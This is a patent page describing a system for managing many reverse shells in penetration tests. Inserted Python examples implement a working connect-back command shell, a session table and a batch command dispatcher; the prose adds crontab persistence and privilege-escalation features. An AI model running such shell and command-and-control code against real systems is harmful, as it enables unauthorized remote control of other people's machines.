CN112307479B - Management method and system of a reverse shell (machine-translated title: "rebound shell") - Google Patents

Info

Publication number: CN112307479B
Application number: CN202011573773.0A
Authority: CN (China)
Legal status: Active (as listed by Google Patents; not a legal conclusion)
Other languages: Chinese (zh)
Other versions: CN112307479A (en)
Prior art keywords: node, target machine, information, session, machine
Inventors: 文彬, 严凡
Current and original assignee: Beijing Telecom Easiness Information Technology Co Ltd

Classifications

G PHYSICS > G06 COMPUTING; CALCULATING OR COUNTING > G06F ELECTRIC DIGITAL DATA PROCESSING > G06F21/00 Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity:
    • G06F21/566: G06F21/50 Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems > G06F21/55 Detecting local intrusion or implementing counter-measures > G06F21/56 Computer malware detection or handling, e.g. anti-virus arrangements > G06F21/566 Dynamic detection, i.e. detection performed at run-time, e.g. emulation, suspicious activities
    • G06F21/73: G06F21/70 Protecting specific internal or peripheral components, in which the protection of a component leads to protection of the entire computer > G06F21/71 ... to assure secure computing or processing of information > G06F21/73 ... by creating or determining hardware identification, e.g. serial numbers
Abstract

The invention relates to a method and system for managing reverse shells. A server listening on a local port is set up; once a reverse shell connects, fingerprint information of the target machine is collected and a unique Session-ID is derived from it so that different shell connections can be told apart, and every node in the set of connections is maintained in a node-information hash table. This gives centralized management when many shells are interacting at the same time and supports processing of various operation instructions, which meets the needs of security personnel during penetration tests of large numbers of cloud servers and large-scale intranets; the system has good applicability and flexibility.

Description

Management method and system of a reverse shell
Technical Field
The invention relates to the field of network information security, and in particular to a method and system for managing reverse shells.
Background
A reverse shell works as follows: the controlling end listens on one of its own TCP/UDP ports and waits for the controlled end to initiate a connection to that port; the standard input and output of the controlled end's command line are then forwarded over that connection to the controlling end, which thereby gains control of the controlled end. The reverse shell is the counterpart of conventional shells such as telnet and ssh (Secure Shell protocol); in essence it is a reversal of the client and server roles as understood in networking. The technique plays an important role in penetration testing.
A reverse shell is typically used when the controlled end's firewall is restrictive, privileges are insufficient, a port is already in use, and similar situations. In the conventional form an attacker compromises a target machine, opens a port on it, and then actively connects to the target (target IP: target port); this is called a forward connection. Remote desktop, web services, ssh, telnet and so on are all forward connections. A forward connection is constrained in the following cases: the target machine sits in a local area network and cannot be reached directly; the target's IP address changes dynamically, so control cannot be sustained; because of a firewall or similar restriction the target can only send requests and cannot accept them; and for viruses and trojans it is unknown when the victim machine will start, when it will connect, and in what network environment. In these cases having the target actively connect to the attacker's machine, i.e. a reverse shell, effectively overcomes the difficulty that the target is hard to reach. However, with the rise of cloud computing and the Internet of Things the number of hosts has grown rapidly, so the complexity of network environments has grown with it, and penetration testing with reverse shells has become harder for security personnel.
A management method and system for reverse shells is therefore needed to cope with security testing work in large, complex network environments.
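The role reversal described above, as an added example that is not part of the patent: the control end binds a listener and the controlled end connects out to it, after which command lines flow one way and their output flows back over the same socket. Both ends run in one process on 127.0.0.1 with an OS-chosen port so the exchange can be observed offline; the length-prefixed reply framing, the newline-per-command convention and the `exit` keyword are this example's own conventions, not anything the patent specifies.

```python
"""Minimal reverse-shell role reversal (added example, not the patent's code).

The control end listens; the controlled end connects back and pipes command
input/output over that connection. Constructed demo: both sides live in one
process on 127.0.0.1 so it runs offline.
"""
import socket
import subprocess
import threading


def controlled_end(host: str, port: int) -> None:
    """The controlled end: connects *out* to the control end, then loops
    reading one newline-terminated command, running it, and sending the
    output back as a 4-byte length prefix plus payload. 'exit' ends it."""
    with socket.create_connection((host, port)) as conn:
        buf = b""
        while True:
            chunk = conn.recv(4096)
            if not chunk:
                return
            buf += chunk
            while b"\n" in buf:
                line, buf = buf.split(b"\n", 1)
                cmd = line.decode().strip()
                if cmd == "exit":
                    return
                try:
                    # shell=False and a fixed argv: only the argument vector the
                    # controller sent is executed, no shell parsing on this side.
                    result = subprocess.run(cmd.split(), capture_output=True, text=True)
                    payload = (result.stdout + result.stderr).encode()
                except (OSError, ValueError) as e:   # unknown binary, empty cmd
                    payload = f"error: {e}\n".encode()
                conn.sendall(len(payload).to_bytes(4, "big") + payload)


def recv_exact(sock: socket.socket, n: int) -> bytes:
    """Read exactly n bytes or raise if the peer goes away mid-frame."""
    data = b""
    while len(data) < n:
        chunk = sock.recv(n - len(data))
        if not chunk:
            raise ConnectionError("peer closed mid-frame")
        data += chunk
    return data


def control_end_session(commands: list, host: str = "127.0.0.1") -> list:
    """The control end: listen, wait for the connect-back, send each command
    and collect its framed output. Returns the outputs in command order."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as listener:
        listener.bind((host, 0))            # port 0: the OS picks a free port
        listener.listen(1)
        port = listener.getsockname()[1]
        # In a real engagement this thread is the target running a payload
        # that connects back; here it is simulated in-process.
        t = threading.Thread(target=controlled_end, args=(host, port), daemon=True)
        t.start()
        conn, _peer = listener.accept()
        outputs = []
        with conn:
            for cmd in commands:
                conn.sendall(cmd.encode() + b"\n")
                n = int.from_bytes(recv_exact(conn, 4), "big")
                outputs.append(recv_exact(conn, n).decode())
            conn.sendall(b"exit\n")
        t.join(timeout=5)
        return outputs


if __name__ == "__main__":
    for out in control_end_session(["echo reverse-shell-ok", "uname"]):
        print(out.strip())
```

Note that the controlled end never listens on anything: from the target's network perspective this is an ordinary outbound TCP connection, which is exactly why the technique passes firewalls that only block inbound traffic.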
Disclosure of Invention
The aim of the invention is to provide a method and system for managing reverse shells that meet the needs of penetration testing of large, complex networks.
To that end the invention provides the following scheme.
A method for managing reverse shells comprises the following steps:
establishing a service program on the simulated attacker machine that listens on a receiving port;
when reverse-shell information from a target machine arrives at the receiving port, collecting fingerprint information of that target machine;
generating a Session-ID for the target machine from its fingerprint information;
constructing a node-information hash table with the fingerprint information and Session-ID of the target machine as the node information, and updating the hash table whenever reverse-shell information from a new target machine is received;
collecting instructions from the simulated attacker machine;
and processing the instructions of the simulated attacker machine using a queue.
The invention also provides a system for managing reverse shells, comprising:
a port listening module for establishing a service program on the simulated attacker machine that listens on a receiving port;
a fingerprint collection module for collecting the fingerprint information of a target machine when its reverse-shell information arrives at the receiving port;
a node management module for generating a Session-ID for the target machine from its fingerprint information,
constructing a node-information hash table with the fingerprint information and Session-ID as node information, and updating the hash table whenever reverse-shell information from a new target machine is received;
a context processing module for collecting the instructions of the simulated attacker machine;
and a function processing module for processing those instructions using a queue.
According to the specific embodiments provided, the invention has the following technical effects:
by establishing a node-information hash table and updating it dynamically according to the reverse-shell state of each target machine, the method and system handle many shells being connected and interacting at the same time; reverse-shell messages to the target machines are managed through queues, and the messages returned by the target machines can be received in series; the method and system are feature-rich, cover several important steps of the security testing process, meet the needs of security personnel performing penetration tests in large complex intranet or cloud environments, and are simple to operate, practical and easy to adopt.
Drawings
To illustrate the embodiments of the invention or the prior-art solutions more clearly, the drawings needed for the embodiments are briefly described below. They show only some embodiments of the invention; those skilled in the art can derive other drawings from them without creative effort.
Fig. 1 is a schematic diagram of a reverse shell according to an embodiment of the invention;
Fig. 2 is a flowchart of the reverse-shell management method according to an embodiment of the invention;
Fig. 3 is a block diagram of the reverse-shell management system according to an embodiment of the invention.
Detailed Description
The technical solutions in the embodiments of the invention are described below clearly and completely with reference to the drawings. The described embodiments are only some of the embodiments of the invention, not all of them; all other embodiments obtained by a person skilled in the art from these without creative effort fall within the scope of protection of the invention.
The aim of the invention is to provide a reverse-shell management method and system that can manage many shells interacting at the same time, solve the batch-processing pain point security personnel face in penetration-testing projects, and in particular make penetration testing noticeably more convenient when facing large numbers of cloud servers and large-scale internal networks.
To make the above objects, features and advantages of the invention easier to understand, embodiments are described in further detail below with reference to the figures.
Example 1
Reverse shells are a function security personnel use routinely during penetration testing. As shown in Fig. 1, the simulated attacker machine listens on its own receiving port; when a target machine sends a request to that port, the simulated attacker machine establishes a session with the target and through that session controls it. In network security, security personnel use a simulated attacker machine to attack a network under test and thereby test its resistance to attack. When facing many target machines in a large, complex network, however, many shells interact at the same time, which is inconvenient for the security personnel.
Therefore, as shown in Fig. 2, this embodiment provides a reverse-shell management method to solve that problem, specifically comprising:
Step 101: establish a service program on the simulated attacker machine that listens on a receiving port;
Step 102: when reverse-shell information from a target machine arrives at the receiving port, collect the target machine's fingerprint information;
Step 103: generate a Session-ID for the target machine from its fingerprint information;
Step 104: construct a node-information hash table with the fingerprint information and Session-ID as node information, and update the hash table whenever reverse-shell information from a new target machine is received;
Step 105: collect the instructions of the simulated attacker machine;
Step 106: process the instructions of the simulated attacker machine using a queue.
In this embodiment, then, different shells are distinguished by generating a unique Session-ID for each reverse shell, every node is maintained in a node hash table, and the commands of the simulated attacker machine are processed through a queue, so that control tests on many target machines can be run simultaneously during a penetration test, which greatly improves the ability to handle complex network environments.
When establishing the service that listens on the receiving port, the command "Run 0.0.0.0 8080" sets the listening address and port, and the system returns the service program's information, for example: "2020/07/06 21:27:51 Server running at: [ a18d2f29801c0d25e5b2c15117fad60f ] 0.0.0.0:2333 (0 online clients)".
Once the listening service is running it waits for a target machine to connect. When reverse-shell information from a target machine arrives at the listened-to receiving port, the simulated attacker machine obtains the target machine's fingerprint information and stores it in a linked list; it can be printed with the info command when needed. The fingerprint information specifically includes the processor model, MAC address, network interface information, operating-system information, relevant vulnerability and patch information, relevant SDK information, and so on. At this point a shell connection exists between the simulated attacker machine and the target machine, initiated by the target. In practice, different kinds of session can be established according to the needs of the simulated attacker, for example a conventional reverse shell or a RESTful API (Representational State Transfer Application Programming Interface) style shell, which gives good flexibility and practicality.
To better control the interaction of many shells, this embodiment distinguishes sessions by generating a unique Session-ID for each session that is established. The Session-ID may be generated by converting the target machine's fingerprint information into binary data, hashing that binary data to obtain a hash value, and using the hash value as the target machine's Session-ID. Other ways of generating the Session-ID may be used as long as different sessions can be distinguished.
After the Session-ID is obtained, all Session-IDs and the corresponding target-machine fingerprint information are placed in a hash table for management and maintenance. The data is also exported to an SQL file at regular intervals so that it can be organised and maintained during the penetration test. Table 1 shows the node information of one node.
Table 1. Node information [table reproduced as an image on the original page; contents not recoverable]
After the node-information hash table has been built, each shell connection must be checked at regular intervals to ensure that the session is still valid, and the hash table is maintained and updated in real time according to the results. When a change in a target machine's fingerprint information is detected, the corresponding node information in the hash table is updated promptly. When the current connection is found to be interrupted, the corresponding node is removed as a zombie node and the fingerprint information of its target machine is exported and backed up promptly; this provides data for the penetration test, helps analyse how well the network withstands attack, and supports targeted improvement.
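Steps 102 to 104 and the maintenance just described, as an added example (not the patent's code): a fingerprint is canonically serialised to bytes, hashed into the Session-ID (claim 4), kept in a hash table keyed by that ID, re-keyed when the fingerprint changes, pruned as a zombie with a backup when the periodic check finds the connection dead, and exported as SQL (claim 5). The field names, the choice of SHA-256, the SQL schema and the two sample fingerprints are this example's assumptions. One caveat worth keeping in mind with this design: because the ID is a pure function of the fingerprint, two targets with identical fingerprints (clones of one image, say) map to one node, and a fingerprint change yields a new ID; a per-connection nonce mixed into the hash would avoid the first problem at the cost of losing the second property.

```python
"""Fingerprint -> Session-ID -> node-information hash table (added example,
not the patent's code). Field names, SHA-256 and the SQL schema are assumed.
"""
import hashlib
import json
import sqlite3
import time

FINGERPRINT_FIELDS = ("cpu", "mac", "nic", "os", "vulns", "patches", "sdk")

# Constructed sample fingerprints for the demo; not real hosts.
SAMPLE_FP_A = {"cpu": "Intel Xeon", "mac": "02:00:00:00:00:01", "nic": "eth0",
               "os": "Ubuntu 18.04", "vulns": [], "patches": [], "sdk": "python3"}
SAMPLE_FP_B = dict(SAMPLE_FP_A, mac="02:00:00:00:00:02", os="CentOS 7")


def fingerprint_to_binary(fp: dict) -> bytes:
    """Canonical binary form: fixed field set, sorted keys, no whitespace,
    so the same host always produces the same bytes (and so the same ID)."""
    normalized = {k: fp.get(k) for k in FINGERPRINT_FIELDS}
    return json.dumps(normalized, sort_keys=True, separators=(",", ":")).encode()


def session_id(fp: dict) -> str:
    """Session-ID = hash of the binary fingerprint (claim 4)."""
    return hashlib.sha256(fingerprint_to_binary(fp)).hexdigest()


class NodeTable:
    """Node-information hash table keyed by Session-ID."""

    def __init__(self):
        self.nodes = {}     # session_id -> node info
        self.backups = []   # fingerprints of nodes removed as zombies

    def register(self, fp: dict, now: float = None) -> str:
        """New target: insert. Known target reconnecting: refresh."""
        sid = session_id(fp)
        now = time.time() if now is None else now
        node = self.nodes.get(sid)
        if node is None:
            self.nodes[sid] = {"session_id": sid, "fingerprint": dict(fp),
                               "first_seen": now, "last_seen": now}
        else:
            node["last_seen"] = now
        return sid

    def update_fingerprint(self, sid: str, new_fp: dict) -> str:
        """Fingerprint changed: re-key the node under the new derived ID."""
        node = self.nodes.pop(sid)
        new_sid = session_id(new_fp)
        node.update(session_id=new_sid, fingerprint=dict(new_fp))
        self.nodes[new_sid] = node
        return new_sid

    def heartbeat_check(self, alive_probe, now: float = None) -> list:
        """Periodic connection check; alive_probe(sid) -> bool. Dead nodes are
        removed as zombies and their fingerprints backed up. Returns removed IDs."""
        now = time.time() if now is None else now
        removed = []
        for sid in list(self.nodes):
            if alive_probe(sid):
                self.nodes[sid]["last_seen"] = now
                continue
            zombie = self.nodes.pop(sid)
            self.backups.append({"session_id": sid, "removed_at": now,
                                 "fingerprint": zombie["fingerprint"]})
            removed.append(sid)
        return removed

    def export_sql(self) -> str:
        """Dump the table as SQL statements (the patent exports to an .sql file)."""
        lines = ["CREATE TABLE IF NOT EXISTS nodes(session_id TEXT PRIMARY KEY,"
                 " fingerprint TEXT, first_seen REAL, last_seen REAL);"]
        for n in self.nodes.values():
            fp = json.dumps(n["fingerprint"], sort_keys=True).replace("'", "''")
            lines.append(f"INSERT OR REPLACE INTO nodes VALUES('{n['session_id']}',"
                         f" '{fp}', {n['first_seen']}, {n['last_seen']});")
        return "\n".join(lines)


def load_export(sql: str) -> int:
    """Round-trip the export through an in-memory SQLite DB; return row count."""
    db = sqlite3.connect(":memory:")
    db.executescript(sql)
    return db.execute("SELECT COUNT(*) FROM nodes").fetchone()[0]


if __name__ == "__main__":
    table = NodeTable()
    a = table.register(SAMPLE_FP_A)
    b = table.register(SAMPLE_FP_B)
    print(table.heartbeat_check(lambda sid: sid == a))   # b is pruned as a zombie
    print(table.export_sql())
```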
Once several shells are connected, the control instructions of the simulated attacker are processed through a queue. To make the management method fit the practical needs of penetration testing, some common penetration-testing functions are integrated into instruction processing, such as setting up a RESTful API interface, uploading and downloading files, batch execution of commands, smooth support for vim, sending Linux kernel signals, support for kernel privilege escalation, running crontab jobs, and so on.
The RESTful API is set up with a command of the form "REST [Host] [port]"; the simulated attacker machine then drives the shell by sending requests, for example:
curl -X POST 'http://127.0.0.1:9090/client/0723c3bed0d0240140e10a6ffd36eed4' --data 'cmd=whoami'
The returned packet is:
{"status":true,"msg":"root"}
For batch execution of commands during the penetration test, the same control command is sent simultaneously to the relevant sessions in the node-information hash table; after execution each return packet is received in series and the results are written to a log file.
For file upload and download, file data is received or written through the socket; multi-threaded download is implemented with an embedded axel module, compression of the data stream is supported, the whole system is easy to package, and batch processing of files is supported, which raises download speed, suits file management in large networks, and lets penetration-testing tasks be completed faster.
This embodiment supports sending kernel signals alongside shell messages, providing functions such as Ctrl-Z/Ctrl-C/Ctrl-V to improve interaction and make the use of vim smoother and more complete.
The management method of this embodiment can also add a task to the crontab that re-establishes the reverse shell from the target machine at regular intervals, so that the connection to the target is better maintained.
When processing a kernel privilege-escalation support command, the collected fingerprint of the target machine is analysed, its operating-system version together with the corresponding vulnerabilities and patches is evaluated, and the corresponding privilege-escalation code is generated.
Of course, this embodiment uses only some common penetration-testing functions as examples to explain instruction processing; this does not mean the shell management method can implement only these functions, and any function needed in penetration testing can be implemented by the invention.
To meet different needs during penetration testing, a single node can also be controlled and operated independently: the command "Jump [session ID]" jumps to a connected node so that that node's target machine can be controlled on its own, which further improves management flexibility.
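Steps 105 and 106 together with the batch, REST and Jump behaviour described above, as an added example (not the patent's code): instructions are collected into a queue, a `Jump` selects the current node, a `Batch` fans one command out to the selected receiving nodes and then collects the return packets in series and logs them (claim 6), and the `POST /client/<session-id>` with `cmd=...` form from the curl example is parsed and answered with the same `{"status":...,"msg":...}` packet. Connected targets are simulated by an in-memory stand-in, the `Batch <cmd> @ sid1,sid2` syntax, the session IDs and the in-memory log are this example's assumptions, and no HTTP server or `REST [Host] [port]` command is implemented here.

```python
"""Queue-driven instruction processing for many reverse shells (added example,
not the patent's code). Targets, session IDs and the Batch syntax are assumed.
"""
import json
import queue
import threading
from urllib.parse import parse_qs, urlparse


class FakeTarget:
    """Stand-in for a connected reverse shell; answers a couple of commands."""

    def __init__(self, hostname: str, user: str):
        self.hostname, self.user = hostname, user

    def run(self, cmd: str) -> str:
        return {"whoami": self.user, "hostname": self.hostname}.get(
            cmd, f"sh: {cmd}: command not found")


class ShellManager:
    def __init__(self, nodes: dict):
        self.nodes = nodes               # session_id -> transport (the hash table)
        self.current = None              # node selected by Jump
        self.instructions = queue.Queue()
        self.log = []                    # stands in for the log file

    # ---- instruction collection (context processing module) ----
    def submit(self, line: str) -> None:
        self.instructions.put(line)

    # ---- instruction processing (function processing module) ----
    def process_all(self) -> list:
        results = []
        while not self.instructions.empty():
            results.append(self.process(self.instructions.get()))
        return results

    def process(self, line: str):
        verb, _, arg = line.partition(" ")
        if verb == "Jump":
            if arg not in self.nodes:
                raise KeyError(f"unknown session {arg}")
            self.current = arg
            return {"status": True, "msg": f"jumped to {arg}"}
        if verb == "Batch":
            # "Batch <cmd> @ sid1,sid2"; without the "@" part every node receives it
            cmd, _, sel = arg.partition(" @ ")
            sids = sel.split(",") if sel else list(self.nodes)
            return self.batch(cmd.strip(), sids)
        if self.current is None:
            raise RuntimeError("no current node; use Jump <session-id> first")
        return self.send(self.current, line)

    def send(self, sid: str, cmd: str) -> dict:
        """One command to one node; the return packet uses the REST format."""
        try:
            return {"status": True, "msg": self.nodes[sid].run(cmd)}
        except Exception as e:            # dead node, transport error, ...
            return {"status": False, "msg": str(e)}

    def batch(self, cmd: str, sids: list) -> dict:
        """Send the same command to all receiving nodes at once, then collect
        the return packets in series (request order) and log each one."""
        replies = {}

        def worker(s):
            replies[s] = self.send(s, cmd)

        threads = [threading.Thread(target=worker, args=(s,)) for s in sids]
        for t in threads:
            t.start()
        for t in threads:
            t.join()
        ordered = {s: replies[s] for s in sids}
        for s, r in ordered.items():
            self.log.append(f"{s} {cmd} -> {json.dumps(r)}")
        return ordered

    # ---- RESTful surface: POST /client/<session-id> with body cmd=<command> ----
    def rest(self, method: str, url: str, body: str) -> str:
        path = urlparse(url).path
        if method != "POST" or not path.startswith("/client/"):
            return json.dumps({"status": False, "msg": "bad request"})
        sid = path[len("/client/"):]
        cmd = parse_qs(body).get("cmd", [""])[0]
        if sid not in self.nodes or not cmd:
            return json.dumps({"status": False, "msg": "unknown session or empty cmd"})
        return json.dumps(self.send(sid, cmd), separators=(",", ":"))


if __name__ == "__main__":
    mgr = ShellManager({"aaa": FakeTarget("web1", "root"),
                        "bbb": FakeTarget("db1", "postgres")})
    print(mgr.rest("POST", "http://127.0.0.1:9090/client/aaa", "cmd=whoami"))
    mgr.submit("Jump bbb")
    mgr.submit("hostname")
    print(mgr.process_all())
    print(mgr.process("Batch whoami @ aaa,bbb"))
    print("\n".join(mgr.log))
```

Because the REST endpoint executes whatever `cmd` it is handed on whichever session the URL names, a real deployment of such an API must bind it to a loopback or otherwise authenticated interface; on the page it is shown on 127.0.0.1:9090, which is the right default.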
Example 2
As another embodiment of the invention, a reverse-shell management system is also provided, as shown in Fig. 3, specifically comprising:
a port listening module M1 for establishing a service program on the simulated attacker machine that listens on a receiving port;
a fingerprint collection module M2 for collecting a target machine's fingerprint information when its reverse-shell information arrives at the receiving port;
a node management module M3 for generating a Session-ID for the target machine from its fingerprint information,
constructing a node-information hash table with the fingerprint information and Session-ID as node information, and updating the hash table whenever reverse-shell information from a new target machine is received;
a context processing module M4 for collecting the instructions of the simulated attacker machine;
and a function processing module M5 for processing those instructions using a queue.
To better ensure that penetration-testing work proceeds, the system further comprises a client link module M6, which checks each shell connection at regular intervals; when the current connection is found to be interrupted, the corresponding node is removed as a zombie node and the fingerprint information of its target machine is exported and backed up promptly.
Each embodiment in this specification is described with emphasis on its differences from the others; the same or similar parts of the embodiments can be referred to one another. As the system disclosed in the embodiment corresponds to the disclosed method, its description is relatively brief and the relevant points can be found in the description of the method.
The principles and embodiments of the invention have been explained using specific examples, which serve only to help understand the method and core concept of the invention; a person skilled in the art may change the specific embodiments and the scope of application according to the idea of the invention. Accordingly, this disclosure should not be construed as limiting the invention.

Claims (8)

1. A method for managing reverse shells, the method comprising:
establishing a service program on a simulated attacker machine that listens on a receiving port;
when reverse-shell information from a target machine arrives at the receiving port, establishing a session between the target machine and the service program, checking the connection state of the session at regular intervals, and collecting fingerprint information of the target machine;
generating a Session-ID for the target machine from the fingerprint information of the target machine;
constructing a node-information hash table with the fingerprint information and the Session-ID of the target machine as node information, updating the node-information hash table when reverse-shell information from a new target machine is received, and removing the node information corresponding to a session from the node-information hash table when interruption of that session's connection is detected;
collecting instructions of the simulated attacker machine;
and processing the instructions of the simulated attacker machine using a queue, jumping to any node in the node-information hash table and controlling the target machine of the current node to execute the instruction of the simulated attacker machine, and, when the instruction of the simulated attacker machine is a command batch-processing instruction, selecting each node in the node hash table that the batch-processing instruction concerns as a receiving node and sending the same control instruction to all receiving nodes.
2. The method of claim 1, wherein, when interruption of the session connection is detected, the node information corresponding to the session is removed from the node-information hash table and the information of the target machine corresponding to the session is exported and backed up.
3. The method of claim 1, wherein, after the fingerprint information of the target machine is collected, it is stored in a linked list.
4. The method of claim 1, wherein generating the Session-ID of the target machine from its fingerprint information specifically comprises:
converting the fingerprint information of the target machine into binary data;
hashing the binary data to obtain a hash value;
and taking the hash value as the Session-ID of the target machine.
5. The method of claim 1, wherein, after the node-information hash table is constructed, it is exported to an SQL file.
6. The method of claim 1, further comprising, after the same control command has been sent to all receiving nodes, receiving and recording the return result of each receiving node in series.
7. The method of claim 1, wherein processing the instructions of the simulated attacker machine further comprises: uploading or downloading files, supporting kernel privilege escalation, and establishing a RESTful API interface.
8. A system for managing reverse shells, the system comprising:
a port listening module for establishing a service program on a simulated attacker machine that listens on a receiving port;
a fingerprint collection module for establishing a session between a target machine and the service program when reverse-shell information from the target machine arrives at the receiving port, checking the connection state of the session at regular intervals, and collecting fingerprint information of the target machine;
a node management module for generating a Session-ID for the target machine from its fingerprint information,
constructing a node-information hash table with the fingerprint information and the Session-ID of the target machine as node information, updating the node-information hash table when reverse-shell information from a new target machine is received, and removing the node information corresponding to a session from the node-information hash table when interruption of that session's connection is detected;
a context processing module for collecting instructions of the simulated attacker machine;
and a function processing module for processing the instructions of the simulated attacker machine using a queue, jumping to any node in the node-information hash table and controlling the target machine of the current node to execute the instruction of the simulated attacker machine, and, when the instruction of the simulated attacker machine is a command batch-processing instruction, selecting each node in the node hash table that the batch-processing instruction concerns as a receiving node and sending the same control instruction to all receiving nodes.
Publications

Application CN202011573773.0A, Management method and system of rebound shell: priority date 2020-12-28, filing date 2020-12-28, family ID 74487586, country CN, status Active.
CN112307479A (en): published 2021-02-02
CN112307479B (en): granted and published 2021-03-30
Citations

* Cited by examiner, † Cited by third party

Patent citations (1)
Publication number | Priority date | Publication date | Assignee | Title
CN104753955A * | 2015-04-13 | 2015-07-01 | 成都双奥阳科技有限公司 | Interconnection auditing method based on rebound port Trojans

Family cites families (6)
Publication number | Priority date | Publication date | Assignee | Title
WO2017160760A1 * | 2016-03-15 | 2017-09-21 | Carbon Black, Inc. | System and method for reverse command shell detection
CN110880983A * | 2019-08-14 | 2020-03-13 | 奇安信科技集团股份有限公司 | Scenario-based penetration testing method and device, storage medium and electronic device
CN110768950A * | 2019-08-14 | 2020-02-07 | 奇安信科技集团股份有限公司 | Penetration instruction sending method and device, storage medium and electronic device
CN110677381B * | 2019-08-14 | 2023-05-09 | 奇安信科技集团股份有限公司 | Penetration test method and device, storage medium and electronic device
CN111581645B * | 2020-04-17 | 2023-08-15 | 北京墨云科技有限公司 | Iterative attack method of an AI-based automatic penetration test system
CN111988302A * | 2020-08-14 | 2020-11-24 | 苏州浪潮智能科技有限公司 | Method, system, terminal and storage medium for detecting rebound (reverse-connecting) programs



Legal Events

Code | Title
PB01 | Publication
SE01 | Entry into force of request for substantive examination
GR01 | Patent grant